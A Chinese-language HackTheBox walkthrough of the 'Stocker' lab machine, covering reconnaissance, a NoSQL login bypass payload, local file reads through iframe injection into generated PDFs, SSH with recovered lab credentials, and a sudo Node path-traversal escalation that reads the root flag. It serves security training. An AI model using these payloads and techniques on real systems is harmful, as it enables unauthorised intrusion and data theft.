Hackthebox - Stocker

靶场信息

靶场类型

信息收集

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -sV -A -sC -p- --min-rate 10000 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-23 05:41 CST
Nmap scan report for 10.10.11.196
Host is up (0.38s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/23%OT=22%CT=1%CU=32979%PV=Y%DS=2%DC=T%G=Y%TM=63CDADB
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=100%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11
OS:NW7%O6=M537ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   274.38 ms 10.10.16.1
2   456.09 ms 10.10.11.196

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.20 seconds

这里需要加一个 hosts 解析

echo 10.10.11.196 stocker.htb >> /etc/hosts

Http

访问后就是个静态页面,没看到什么可以利用的东西,做一下 fuzz 吧

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -u http://stocker.htb/ --no-error --append-domain
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://stocker.htb/
[+] Method:          GET
[+] Threads:         200
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.3
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/01/23 05:53:18 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.stocker.htb Status: 302 [Size: 28] [--> /login]
Progress: 114420 / 114442 (99.98%)===============================================================
2023/01/23 05:56:08 Finished
===============================================================

发现一个虚拟主机,加入 hosts 解析

echo 10.10.11.196 dev.stocker.htb >> /etc/hosts

然后再去访问一下

dev.stocker.htb

是一个登录框

漏洞利用

这里是一个基础的 nosql 注入

https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass

修改 Content-Type 内容为 application/json

然后使用上面参考文献里的 {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } 进行绕过

成功登录,这里是一个购物中心

随便添加一个物品,然后抓个包看看

去看一下提交后得到的订单文件

得到的是一个 pdf 格式的订单,尝试修改一下 Title 的内容呢?

ok,也是可以成功修改的

那么我们提交 iframe 之类的使其渲染时嵌入本地文件呢?

ok,也可行,读取成功

然后就是无限读文件的测试,这里直接跳过,在 /etc/passwd 获得了账号。

接着在 /var/www/dev/index.js 获得了密码

username = angoose
password = IHeardPassphrasesArePrettySecure

然后使用 ssh 进行登录

┌──(root㉿kali)-[~/Desktop]
└─# ssh angoose@10.10.11.196
angoose@10.10.11.196's password: 
Last login: Sun Jan 22 22:39:59 2023 from 10.10.16.12
angoose@stocker:~$ whoami&&id
angoose
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)

成功获得 user 权限

angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
6d51a15b13661ffb827c22f4a7662492

成功获得 user 权限的 flag 文件

权限提升

angoose@stocker:~$ sudo -l
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

可以使用 sudo 权限调用 /usr/bin/node 执行 /usr/local/scripts/ 目录下的所有 js 文件

我们的目的只是要获取 /root/root.txt 文件的内容,那么就可以使用 js read file 来进行利用

const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
  if (err) throw err;
  console.log(data);
});

在当前目录创建一个 js 内容,然后使用目录穿越来进行调用

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/exp.js 
45d08dd713ea28830a34b4186236290e

成功调用并利用我们自己创建的 js 文件,成功拿到 root 权限的 flag 文件